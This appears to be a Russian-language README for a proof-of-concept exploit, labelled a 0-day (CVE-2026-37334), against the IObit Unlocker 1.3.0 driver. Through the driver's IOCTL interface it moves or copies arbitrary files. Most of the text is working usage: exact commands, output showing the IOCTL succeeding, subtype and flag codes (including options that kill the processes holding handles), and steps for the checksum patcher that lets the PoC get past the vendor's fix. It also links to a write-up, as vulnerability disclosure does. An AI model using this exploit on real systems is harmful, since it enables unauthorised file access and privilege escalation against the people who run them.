
(0 day) CVE-2026-37334 Перемещает или копирует любой файл. Обходит предыдущий патч с помощью трюка с контрольной суммой. IObit Unlocker v. 1.3.0
(0 day) Перемещает или копирует любой файл. Обходит предыдущий патч с помощью трюка с контрольной суммой.
Статья: https://nathan2.com/files/iobit.pdf Общая информация: https://nathan2.com/posts/iobit/
Я обнаружил это, не зная, что ранее уже существовал другой эксплойт, который нашёл это первым. Однако этот обходит патч, который выпустила IObit. Работает в версии 1.3.0
Использование:
C:\Users\nathan\source\repos\driverhandlerchecker\x64\Release\driverhandlerchecker.exe "C:\copied.txt" "C:\t.txt" 4 1
--- Отправка запроса ---
Источник: C:\copied.txt
Назначение: C:\t.txt
Подтип: 4 | Флаги: 1
IOCTL выполнен успешно. Драйвер вернул 4 байта.
Проверка: Целевой файл существует/доступен.
Дополнительные флаги:
Использование: UnlockerCLI.exe <ПутьИсточника> <ПутьНазначения> <Подтип> <Флаги>
Пример: UnlockerCLI.exe "C:\Путь С Пробелом\файл.txt" "C:\backup\файл.txt" 3 (подтип) 5 (флаг операции)
Подтипы: (по крайней мере те, что использую я) 3=переместить, 4=копировать
Флаги операций: 0=Не удалять дескриптор, 1 = удалить дескрипторы, 2 = завершить процессы с дескрипторами, 4 = завершить процессы и удалить дескрипторы, 5??? экспериментируйте.
Прилагаемый исполняемый файл должен быть работоспособным и уже пропатченным. Если нет, читайте ниже.
Используйте патчер контрольной суммы, чтобы пропатчить PoC. Вот так:
C:\Users\nathan\source\repos\driverhandlerchecker\x64\Release\checksumpatcher.exe C:\Users\nathan\source\repos\driverhandlerchecker\x64\Release\driverhandlerchecker.exe
Исходный размер файла: 235449 байт
Текущая чередующаяся сумма: 11044471
Текущая XOR-сумма: 43
Файл уже имеет правильные контрольные суммы. Изменения не требуются.
Это позволит исполняемому файлу взаимодействовать с драйвером IObitUnlocker.